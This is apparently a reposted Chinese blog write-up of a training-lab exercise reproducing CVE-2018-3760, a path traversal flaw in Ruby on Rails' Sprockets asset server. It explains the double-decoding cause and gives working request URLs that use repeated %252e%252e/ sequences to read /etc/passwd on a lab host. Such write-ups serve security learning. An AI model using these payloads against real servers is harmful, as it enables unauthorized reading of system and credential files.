首页 > 其他 > 详细

墨者 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

时间:2020-04-20 00:51:16      阅读:80      评论:0      收藏:0      [点我收藏+]

首先得去了解这个漏洞的原理

Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。

Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。



版本 <=Sprockets 3.7.1
利用手法 %252e%252e/ 不断返回上级目录

之后用http://219.153.49.228:45351/assets/file:%2f%2f/etc/passwd尝试读取其存放密码的文件
但是发现
技术分享图片
但是他爆出来很多可以访问的目录
于是通过可以访问的目录 然后不断 %252e%252e/  %252e%252e/ 返回根目录 再去访问/etc/password
http://219.153.49.228:45351/assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd

?技术分享图片

墨者 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

原文:https://www.cnblogs.com/cat47/p/12735334.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!